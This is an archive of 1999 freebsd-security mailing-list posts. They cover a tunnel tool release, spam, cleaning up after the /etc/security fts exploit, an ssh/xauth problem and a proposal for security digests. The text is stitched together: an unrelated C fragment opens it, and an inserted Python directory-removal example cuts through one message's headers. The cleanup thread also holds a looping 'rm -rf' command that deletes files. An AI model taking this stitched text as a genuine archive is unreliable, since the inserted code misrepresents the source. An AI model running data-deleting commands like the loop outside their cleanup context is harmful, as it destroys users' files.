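int demo_amq_string(struct plog_result *r)
{
    static char s[1025];
    memset(s, 'x', 1024);       /* plain filler, not a payload */
    s[1024] = '\0';
    safe_plog(r, "amq requested mount of %s, but code is disabled", s);
    return r->truncated;
}
```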
From: "Sergey S. Kosyakov"
To: freebsd-net@freebsd.org, freebsd-security@freebsd.org, freebsd-users@freebsd.org
Subject: New tool for IP secure tunnels

1.0 version of TUND was released.
ftp://ftp.chg.ru/pub/networking/freebsd/README

TUND allows for creation of IP over IP (current version) tunnels, which can
help to organize private networks, secure channels, non-trivial network
topologies, etc. TUND can work upon tun(4) interface or divert(4) sockets.
With a single running process of TUND up to 65534 tunnels can be created.
If a tunnel is configured to work with tun(4) pseudo-device, it can be fed
with standard IP routing (route add ...). In the case of ipfw(8), when a
tunnel is configured to work with divert(4) socket, it can be fed in many
ways - by source or destination, by protocol, by ports, etc.

TUND supports compression with ZLIB. Compression level can be configured in
tund.conf.

Data in tunnels can be encrypted with BlowFish, IDEA or RC5 ciphers from
OpenSSL. Symmetric keys for ciphers are passed with RSA identification and
encryption. Each host running TUND has its own RSA private key. The public
version of this key should be transferred to the other end of the tunnel.
A random number is mixed with data before encryption to prevent "dictionary"
attacks.
---
----------------------------------
Sergey Kosyakov
Laboratory of Distributed Computing
Department of High-Performance Computing and Applied Network Research
Landau Institute for Theoretical Physics
E-Mail: ks@chg.ru
Date: 02-Sep-99
Time: 15:38:56
----------------------------------
---

From owner-freebsd-security Thu Sep 2 07:17:57 1999
Received: from pop111.ocn.ne.jp (pop111.ocn.ne.jp [202.234.233.71]) by hub.freebsd.org (Postfix) with ESMTP id 6C3E515BAB for ; Thu, 2 Sep 1999 07:17:44 -0700 (PDT) (envelope-from academy@academyjapan.co.jp)
Received: from pop111.ocn.ne.jp by pop111.ocn.ne.jp (8.9.1a/OCN) id XAA11532; Thu, 2 Sep 1999 23:16:04 +0900 (JST)
Date: Thu, 2 Sep 1999 23:16:04 +0900 (JST)
Message-Id: <199909021416.XAA11532@pop111.ocn.ne.jp>
From: Academy Japan
To: freebsd-security@FreeBSD.org
X-Mailer: Direct Email v0.22
Subject: Info on Videophone
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit

[Japanese text, translated:]
Hello, this is handy! Ideal news for hotels, inns, people posted away from
their families, and students abroad: an introduction to the simple
videophone that the whole world is talking about. Just connect it to the TV
and telephone in your home and they turn into a TV phone (no installation
work needed). Phone charges are the same as before. Talk to distant friends
and family while seeing their faces, for peace of mind. The price is 69,000
yen per unit. Please click below.

[The sender's own English version:]
Here's good news for you, news of the Videophone over the normal color
telephone line. All you have to do is just connect this videophone with the
telephone and television which you have in your home. Telephone charge is
the same as ever. Face to face communication with your distant family.
Price per unit: 69,000 yen. Please click below.
http://www.academyjapan.co.jp
academy@academyjpan.co.jp

Thu, 2 Sep 1999 09:13:21 -0700 (PDT) (envelope-from mayres@zone.unixshell.com)
Received: from localhost (mayres@localhost) by zone.unixshell.com (8.9.3/8.9.3) with ESMTP id MAA98497 for ; Thu, 2 Sep 1999 12:13:16 -0400 (EDT) (envelope-from mayres@zone.unixshell.com)
Date: Thu, 2 Sep 1999 12:13:16 -0400 (EDT)
From: Matt Ayres
To: freebsd-security@FreeBSD.ORG
Subject: /etc/security exploit
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hey everybody, sorry to ask this question again, but how do I delete the
directory made by the /etc/security exploit?

Thanks,
Matt Ayres

From owner-freebsd-security Thu Sep 2 09:32:25 1999
Received: from unicorn.carrier.kiev.ua (unicorn.carrier.kiev.ua [193.193.193.113]) by hub.freebsd.org (Postfix) with ESMTP id 46E9914BDB for ; Thu, 2 Sep 1999 09:32:20 -0700 (PDT) (envelope-from netch@carrier.kiev.ua)
Received: (from netch@localhost) by unicorn.carrier.kiev.ua (8.Who.Cares/8.Who.Cares) id TAA19051; Thu, 2 Sep 1999 19:31:21 +0300 (EEST) (envelope-from netch)
Date: Thu, 2 Sep 1999 19:31:21 +0300
From: Valentin Nechayev To: Matt Ayres Cc: freebsd-security@FreeBSD.ORG Subject: Re: /etc/security exploit Message-ID: <19990902193120.A21070@lucky.net> Reply-To: netch@lucky.net References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Matt Ayres on Thu, Sep 02, 1999 at 12:13:16PM -0400 X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thu, Sep 02, 1999 at 12:13:16, mayres wrote about "/etc/security exploit": > Hey everybody, sorry to ask this question again, but how do I delete the > directory made by the /etc/security exploit? ;)
    while :; do
        rm -rf 1 2 *core*
        mv *Y* 1
        mv 1/A* 2
        rm -rf 1 *core*
        mv 2/* .
        rm -rf 2 *core*
        echo -n '.'
    done
(according to standard Babcia_Padlina's exploit) -- -- Valentin Nechayev netch@lucky.net II:LDXIII/MCMLXXII.CCC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 10:34:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from merkur.hrz.uni-giessen.de (merkur.hrz.uni-giessen.de [134.176.2.12]) by hub.freebsd.org (Postfix) with ESMTP id 2803C14CD0 for ; Thu, 2 Sep 1999 10:34:38 -0700 (PDT) (envelope-from Ferdinand.Wiecha@stkolleg.fh-giessen.de) Received: from caspar.mni.fh-giessen.de by merkur.hrz.uni-giessen.de with ESMTP for freebsd-security@freebsd.org; Thu, 2 Sep 1999 19:33:57 +0200 Received: from asc-p07.mni.fh-giessen.de ([134.176.180.227] helo=stkolleg.fh-giessen.de ident=fchw) by caspar.mni.fh-giessen.de with esmtp (Exim 2.12 #6) id 11MaaM-00080w-00 for freebsd-security@FreeBSD.ORG; Thu, 2 Sep 1999 19:23:42 +0200 Message-Id: <37CEB59C.FC310EE5@stkolleg.fh-giessen.de> Date: Thu, 02 Sep 1999 19:36:28 +0200 
From: "Ferdinand Ch. Wiecha" X-Mailer: Mozilla 4.61 [en] (X11; I; Linux 2.2.12 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 14: 0:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.gw.tislabs.com (relay.gw.tislabs.com [192.94.214.100]) by hub.freebsd.org (Postfix) with ESMTP id 408F114F42 for ; Thu, 2 Sep 1999 14:00:39 -0700 (PDT) (envelope-from stevek@tislabs.com) Received: by relay.gw.tislabs.com; id RAA22566; Thu, 2 Sep 1999 17:05:21 -0400 (EDT) Received: from clipper.gw.tislabs.com(10.33.1.2) by relay.gw.tislabs.com via smap (4.1) id xma022558; Thu, 2 Sep 99 17:05:15 -0400 Received: from mufasa.va.tislabs.com (mufasa.va.tislabs.com [192.168.10.18]) by clipper.gw.tislabs.com (8.9.3/8.9.1) with ESMTP id QAA03717 for ; Thu, 2 Sep 1999 16:58:44 -0400 (EDT) Received: from localhost (stevek@localhost) by mufasa.va.tislabs.com (8.9.3/8.9.3) with ESMTP id QAA53897 for ; Thu, 2 Sep 1999 16:59:21 -0400 (EDT) (envelope-from stevek@mufasa.va.tislabs.com) Date: Thu, 2 Sep 1999 16:59:21 -0400 (EDT) 
From: Steve Kiernan To: freebsd-security@freebsd.org Subject: Generic Software Wrappers 1.2.1 now available... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Some time ago there was some discussion of adding security policies to the FreeBSD kernel. ("Using capabilties aaginst shell code" August 1998) In that thread, Robert Watson had referred to the Generic Software Wrappers Toolkit which we at NAI Labs (formerly TIS Labs) were working on. We now have a release available for use. The current source release contains support for FreeBSD 2.2.x on Intel x86 and Solaris 2.6 on UltraSPARC, and preliminary support for FreeBSD 3.x on Intel x86 (not all syscalls are characterized and the code is not SMP-safe) and Windows NT on Intel x86 (the implementation is in user-space and not complete). The following is an excerpt from the readme file (you can grab a copy of the Toolkit from ftp://ftp.tislabs.com/pub/wrappers): Generic Software Wrappers Large-scale critical information systems increasingly are built by combining Commercial Off The Shelf (COTS) software components. Unfortunately, security and reliability requirements of critical information systems may not be apparent until such systems are near deployment: COTS software cannot be designed to anticipate all such requirements. Additionally, cost factors dictate that COTS software is developed with "commercial-grade" assurance. For these reasons, technologies are needed both to add security and reliability functionality to COTS software, and to increase general assurance of systems composed of COTS components. This DARPA-sponsored research (under contract F30602-96-C-0333) is developing techniques and tools for specifying and implementing generic software wrappers. 
Generic software wrappers intercept COTS component interactions and bind them with additional functions that implement practical security (e.g., restricting, filtering) and reliability (e.g., redundancy, crash data recovery) policies. This research is organized into three tasks:
1) Formulate both a preliminary Wrapper Definition Language (WDL) for specifying security and reliability software wrappers and a preliminary Wrapper Support Interface (WSI) that provides operating system services needed by wrappers. Prototype a WDL compiler and develop a WSI simulator to provide experimental feedback during the formulation of the
2) Develop a wrapper-supporting FreeBSD UNIX prototype system. Develop a Wrapper Support Subsystem (WSS) suitable for inclusion in mainstream kernelized UNIX systems, and develop WDL wrapper tools for conveniently wrapping/unwrapping selected UNIX system components.
3) Develop Sun Solaris and Windows NT wrapper-supporting prototype systems. Adjust the WDL and the WSI as needed to support these environments. By developing multiple prototypes, demonstrate that wrapper concepts are portable to dissimilar systems.
Tasks one and two are complete. Task three is partially complete, with the Windows NT port still under development. This software is a proof of concept. It has bugs. Since it adds functionality to the kernel, those bugs may trash your system. Do Not Use This Software on systems you cannot afford to trash. We know there are unfixed bugs that can and will crash the operating system. You have been warned. -- Stephen Kiernan stevek@tislabs.com NAI Labs, A Division of Network Associates, Inc. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 2 23:47:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5A4D714EE8 for ; Thu, 2 Sep 1999 23:47:23 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA19993; Fri, 3 Sep 1999 00:47:18 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA23391; Fri, 3 Sep 1999 00:47:22 -0600 (MDT) Message-Id: <199909030647.AAA23391@harmony.village.org> To: netch@lucky.net Subject: Re: /etc/security exploit Cc: Matt Ayres , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 02 Sep 1999 19:31:21 +0300." <19990902193120.A21070@lucky.net> References: <19990902193120.A21070@lucky.net> Date: Fri, 03 Sep 1999 00:47:22 -0600 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Or use a find -delete built with my kludge fixes. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 3: 5:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from twin.kar.net (twin.kar.net [195.178.131.130]) by hub.freebsd.org (Postfix) with ESMTP id 7D5E614FB5 for ; Fri, 3 Sep 1999 03:05:30 -0700 (PDT) (envelope-from tamara @igph.kiev.ua) Received: from inst.igph.kiev.ua ([195.178.144.6]) by twin.kar.net (8.9.3/8.9.3) with ESMTP id NAA09585 for ; Fri, 3 Sep 1999 13:10:12 +0300 (EET DST) Received: from igph.kiev.ua by inst.igph.kiev.ua with ESMTP id NAA06488; (8.8.7/vAk3/1.9) Fri, 3 Sep 1999 13:03:57 +0300 (EEST) Message-ID: <37CF8E90.ED49634B@igph.kiev.ua> Date: Fri, 03 Sep 1999 13:02:08 +0400 
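For the /etc/security exploit cleanup thread above (Matt Ayres' question, Valentin's move-up-one-level loop and Warner's fixed find -delete), here is an added example that is not from the thread: it removes a directory tree whose nesting is far deeper than PATH_MAX allows a full path to be, which (as the loop that shuffles subtrees upward suggests) is the obstacle that makes a plain rm -rf give up with ENAMETOOLONG. It does so the way the later fts fixes do, with directory-fd-relative syscalls that only ever name one path component at a time. The fixture builder, the "dd"/"marker" names and the depth of 3000 are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Open flags for directories; O_NOFOLLOW keeps a symlink planted in the tree
# from redirecting the cleanup somewhere else.
_DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW


def make_deep_tree(root, depth, name="dd"):
    """Constructed fixture: build root/dd/dd/.../dd (depth levels) with one
    regular file at the bottom, using only fd-relative mkdir/open so that the
    fixture itself is not limited by PATH_MAX. Returns the leaf's full path."""
    os.mkdir(root)
    fd = os.open(root, _DIR_FLAGS)
    try:
        for _ in range(depth):
            os.mkdir(name, dir_fd=fd)
            child = os.open(name, _DIR_FLAGS, dir_fd=fd)
            os.close(fd)
            fd = child
        leaf = os.open("marker", os.O_WRONLY | os.O_CREAT, 0o600, dir_fd=fd)
        os.close(leaf)
    finally:
        os.close(fd)
    return os.path.join(root, *([name] * depth), "marker")


def full_path_is_usable(path):
    """True if the kernel accepts the complete path; for a deep tree lstat
    fails with ENAMETOOLONG, which is why path-based tools cannot remove it."""
    try:
        os.lstat(path)
        return True
    except OSError:
        return False


def remove_deep_tree(root):
    """Delete root and everything below it without ever naming more than one
    component at a time. One directory fd walks down into the first
    subdirectory found and walks back up via '..' once a directory is empty,
    so neither path length nor the number of open fds grows with the depth.
    Returns the number of entries (files and directories) removed."""
    removed = 0
    pending = []  # names of the directories we have descended into
    fd = os.open(root, _DIR_FLAGS)
    try:
        while True:
            subdir = None
            for entry in os.listdir(fd):
                st = os.lstat(entry, dir_fd=fd)  # never follow symlinks
                if stat.S_ISDIR(st.st_mode):
                    subdir = entry
                    break
                os.unlink(entry, dir_fd=fd)
                removed += 1
            if subdir is not None:
                child = os.open(subdir, _DIR_FLAGS, dir_fd=fd)
                os.close(fd)
                fd = child
                pending.append(subdir)
                continue
            # Current directory is empty: step up one level and remove it.
            if not pending:
                break
            parent = os.open("..", _DIR_FLAGS, dir_fd=fd)
            os.close(fd)
            fd = parent
            os.rmdir(pending.pop(), dir_fd=fd)
            removed += 1
    finally:
        os.close(fd)
    os.rmdir(root)
    return removed + 1


def demo(depth=3000):
    """Build, check and remove a constructed deep tree. Returns
    (leaf path length, full path usable?, entries removed, root still exists?)."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "deep")
    leaf = make_deep_tree(root, depth)
    usable = full_path_is_usable(leaf)
    removed = remove_deep_tree(root)
    still_there = os.path.exists(root)
    os.rmdir(base)
    return len(leaf), usable, removed, still_there


if __name__ == "__main__":
    length, usable, removed, still_there = demo()
    print("leaf path length %d, usable by lstat: %s" % (length, usable))
    print("removed %d entries, root still present: %s" % (removed, still_there))
```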
From: Tamara <"tamara "@igph.kiev.ua> X-Mailer: Mozilla 4.04 [en] (Win95; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please ! The mailing list discusses various security matters related to FreeBSD including ipfw. Thank you To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 5:30:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from thelab.hub.org (nat203.199.mpoweredpc.net [142.177.203.199]) by hub.freebsd.org (Postfix) with ESMTP id 9FE1D14D0E for ; Fri, 3 Sep 1999 05:30:30 -0700 (PDT) (envelope-from scrappy@hub.org) Received: from localhost (scrappy@localhost) by thelab.hub.org (8.9.3/8.9.1) with ESMTP id JAA64491 for ; Fri, 3 Sep 1999 09:28:09 -0300 (ADT) (envelope-from scrappy@hub.org) X-Authentication-Warning: thelab.hub.org: scrappy owned process doing -bs Date: Fri, 3 Sep 1999 09:28:09 -0300 (ADT) 
From: The Hermit Hacker To: freebsd-security@freebsd.org Subject: ssh + xauth problem ... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When I login using ssh, I get the following message: /usr/X11R6/bin/xauth: (stdin):1: bad display name "hub:19.0" in "add" command I've tried recompiling/installing XFree86 *and* ssh, but can't get rid of it... I see it on none of my other FreeBSD machines. xauth is as of today: hub> ls -lt /usr/X11R6/bin/xauth -rwxr-xr-x 1 root wheel 25896 Sep 3 07:45 /usr/X11R6/bin/xauth Can someone point me at where I need to fix this? :( Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy Systems Administrator @ hub.org primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 9: 8:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from bantu.cl.msu.edu (bantu.cl.msu.edu [35.8.3.18]) by hub.freebsd.org (Postfix) with ESMTP id A7C6814C42 for ; Fri, 3 Sep 1999 09:08:51 -0700 (PDT) (envelope-from dervish@bantu.cl.msu.edu) Received: (from dervish@localhost) by bantu.cl.msu.edu (8.9.3/8.9.3) id MAA69320; Fri, 3 Sep 1999 12:06:25 -0400 (EDT) (envelope-from dervish) Date: Fri, 3 Sep 1999 12:06:25 -0400 
From: bush doctor To: The Hermit Hacker Cc: freebsd-security@freebsd.org Subject: Re: ssh + xauth problem ... Message-ID: <19990903120625.A69076@bantu.cl.msu.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from The Hermit Hacker on Fri, Sep 03, 1999 at 09:28:09AM -0300 X-Operating-System: FreeBSD 4.0-CURRENT i386 X-PGP-Fingerprint: 35 95 F8 63 DA 5B 32 51 8F A9 AC 3C B4 74 F3 BA WWW-Home-Page: http://www.msu.edu/~ikhala Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Out of da blue The Hermit Hacker aka (scrappy@hub.org) said: > > When I login using ssh, I get the following message: > > /usr/X11R6/bin/xauth: (stdin):1: bad display name "hub:19.0" in "add" command > > I've tried recompiling/installing XFree86 *and* ssh, but can't get rid of > it... I see it on none of my other FreeBSD machines. > > xauth is as of today: > > hub> ls -lt /usr/X11R6/bin/xauth > -rwxr-xr-x 1 root wheel 25896 Sep 3 07:45 /usr/X11R6/bin/xauth > > Can someone point me at where I need to fix this? :( looks like you need something like this in the global .cshrc file on the remote host:
    # set display if remote login ...
    if ($?REMOTEHOST) then
        setenv DISPLAY $REMOTEHOST\:0.0
    endif
Remember that sshd sets the X11 display offset in its config file a la X11DisplayOffset 10 hth > > Marc G. Fournier ICQ#7615664 IRC Nick: Scrappy > Systems Administrator @ hub.org > primary: scrappy@hub.org secondary: scrappy@{freebsd|postgresql}.org > > #:^) -- So ya want ta here da roots? Dem that feels it knows it ... 
bush doctor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 10:46:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from super-g.com (super-g.com [207.240.140.161]) by hub.freebsd.org (Postfix) with ESMTP id 7C7F41510D for ; Fri, 3 Sep 1999 10:46:45 -0700 (PDT) (envelope-from spork@super-g.com) Received: by super-g.com (Postfix, from userid 1000) id E9270B8DE; Fri, 3 Sep 1999 13:44:42 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by super-g.com (Postfix) with SMTP id D8DC2B8DC for ; Fri, 3 Sep 1999 13:44:42 -0400 (EDT) Date: Fri, 3 Sep 1999 13:44:42 -0400 (EDT) 
From: spork X-Sender: spork@super-g.inch.com To: freebsd-security@freebsd.org Subject: Security Alerts Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've been reading bugtraq more often than this list (2500 messages in this box..) and following a few FBSD exploits there (/etc/security / fts, the mbuf DoS) and also a few where it's unclear as to whether FBSD is affected (libtermcap, wu-ftpd, proftpd). So what I'm wondering is whether the project is in need of someone to digest, discuss, and regurgitate some of these things into security advisories. I personally can appreciate the fact that an ordinary user or admin might not be able to follow every bug that comes up on bugtraq or on this list, and the idea of a central repository on the FreeBSD webpage that is kept up to date and includes third-party software (esp. if it's in common use, like wu) seems like a good one. So I'm volunteering to write this stuff up, all I need is the go-ahead from someone... Charles --- Charles Sprickman spork@super-g.com --- "...there's no idea that's so good you can't ruin it with a few well-placed idiots." 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 12:43: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from cm-24-142-61-16.cableco-op.ispchannel.com (cm-24-142-61-16.cableco-op.ispchannel.com [24.142.61.16]) by hub.freebsd.org (Postfix) with ESMTP id 8E18E150D8 for ; Fri, 3 Sep 1999 12:43:03 -0700 (PDT) (envelope-from jwgray@netbox.com) Received: from localhost (jwgray@localhost) by cm-24-142-61-16.cableco-op.ispchannel.com (8.8.8/8.8.8) with ESMTP id MAA17772; Fri, 3 Sep 1999 12:41:15 -0700 (PDT) (envelope-from jwgray@netbox.com) X-Authentication-Warning: cm-24-142-61-16.cableco-op.ispchannel.com: jwgray owned process doing -bs Date: Fri, 3 Sep 1999 12:41:15 -0700 (PDT) 
From: Jeff X-Sender: jwgray@cm-24-142-61-16.cableco-op.ispchannel.com To: spork Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Alerts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wonderful idea. I lurk on this group and bugtraq/securityfocus and fall into your target market - which ones are critical, which ones are minor risks, which ones affect FBSD. Count me in as a reader of your digests. I am certain that there are many many lurkers such as myself. Thanks for volunteering. Jeff On Fri, 3 Sep 1999, spork wrote: > Hi, > > I've been reading bugtraq more often than this list (2500 messages in this > box..) and following a few FBSD exploits there (/etc/security / fts, the > mbuf DoS) and also a few where it's unclear as to whether FBSD is affected > (libtermcap, wu-ftpd, proftpd). > > So what I'm wondering is whether the project is in need of someone to > digest, discuss, and regurgitate some of these things into security > advisories. I personally can appreciate the fact that an ordinary user or > admin might not be able to follow every bug that comes up on bugtraq or on > this list, and the idea of a central repository on the FreeBSD webpage > that is kept up to date and includes third-party software (esp. if it's in > common use, like wu) seems like a good one. > > So I'm volunteering to write this stuff up, all I need is the go-ahead > from someone... > > Charles > > --- > Charles Sprickman > spork@super-g.com > --- > "...there's no idea that's so good you can't > ruin it with a few well-placed idiots." 
> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 13:22:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from metis.host4u.net (metis.host4u.net [209.150.128.22]) by hub.freebsd.org (Postfix) with ESMTP id 4A0CD14E1E for ; Fri, 3 Sep 1999 13:22:52 -0700 (PDT) (envelope-from dan.langille@dvl-software.com) Received: from wocker (210-55-152-212.ipnets.xtra.co.nz [210.55.152.212]) by metis.host4u.net (8.8.5/8.8.5) with ESMTP id PAA24920; Fri, 3 Sep 1999 15:20:54 -0500 Message-Id: <199909032020.PAA24920@metis.host4u.net> 
From: "Dan Langille" Organization: DVL Software Limited To: spork Date: Sat, 4 Sep 1999 08:20:59 +1200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Security Alerts Reply-To: dan.langille@dvl-software.com Cc: freebsd-security@freebsd.org In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12a) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3 Sep 99, at 13:44, spork wrote: > So I'm volunteering to write this stuff up, all I need is the go-ahead from > someone... Just do it. The good thing about services such as the one you are proposing is that it doesn't need anyone's "approval". If you think it's a good idea, do it. People will use it. [If a place can't be found within the FreeBSD pages, then I'll be quite happy to publish them on The FreeBSD Diary.] -- Dan Langille - DVL Software Limited The FreeBSD Diary - http://www.freebsdiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm unix @ home - http://www.unixathome.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 16:36:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id D81F914CC9 for ; Fri, 3 Sep 1999 16:36:50 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id QAA67512; Fri, 3 Sep 1999 16:36:39 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: spork Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security Alerts In-reply-to: Your message of "Fri, 03 Sep 1999 13:44:42 EDT." Date: Fri, 03 Sep 1999 16:36:39 -0700 Message-ID: <67508.936401799@localhost> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > So what I'm wondering is whether the project is in need of someone to > digest, discuss, and regurgitate some of these things into security > advisories. I personally can appreciate the fact that an ordinary user or > admin might not be able to follow every bug that comes up on bugtraq or on More than actually generating advisories, something which our security officers do a pretty reasonable job on, what we *really* need is someone to test the existing advisories/random reports/etc and figure out which exploits or DoS attacks are actually genuine. Quite a bit of stuff gets sent to the security list and quite a bit of it often has no applicability whatsoever to FreeBSD, leading to a situation where security officers put it on the "test this at some point" pile and that pile can get pretty deep. When faced with a "this has been tested and the following releases of FreeBSD are vulnerable" sort of message, however, they know that it's clearly a matter for immediate attention and it gets "escalated" quite a bit. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 3 23: 7:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.cybcon.com (mail.cybcon.com [216.190.188.5]) by hub.freebsd.org (Postfix) with ESMTP id EBB3F151D0 for ; Fri, 3 Sep 1999 23:07:42 -0700 (PDT) (envelope-from wwoods@cybcon.com) Received: from freebsd.cybcon.com (william@pm3b-11.cybcon.com [205.147.75.76]) by mail.cybcon.com (8.9.0/8.9.0) with ESMTP id XAA23885; Fri, 3 Sep 1999 23:06:42 -0700 (PDT) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <67508.936401799@localhost> Date: Fri, 03 Sep 1999 23:06:42 -0700 (PDT) Reply-To: wwoods@cybcon.com 
From: William Woods To: "Jordan K. Hubbard" Subject: Re: Security Alerts Cc: freebsd-security@FreeBSD.ORG, spork Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan, I don't know C programming very well at all, I am starting a C class in a week, but is there something I could do to help with this situation? William On 03-Sep-99 Jordan K. Hubbard wrote: >> So what I'm wondering is whether the project is in need of someone to >> digest, discuss, and regurgitate some of these things into security >> advisories. I personally can appreciate the fact that an ordinary user or >> admin might not be able to follow every bug that comes up on bugtraq or on > > More than actually generating advisories, something which our security > officers do a pretty reasonable job on, what we *really* need is > someone to test the existing advisories/random reports/etc and figure > out which exploits or DoS attacks are actually genuine. Quite a bit > of stuff gets sent to the security list and quite a bit of it often > has no applicability whatsoever to FreeBSD, leading to a situation > where security officers put it on the "test this at some point" pile > and that pile can get pretty deep. When faced with a "this has been > tested and the following releases of FreeBSD are vulnerable" sort of > message, however, they know that it's clearly a matter for immediate > attention and it gets "escalated" quite a bit. 
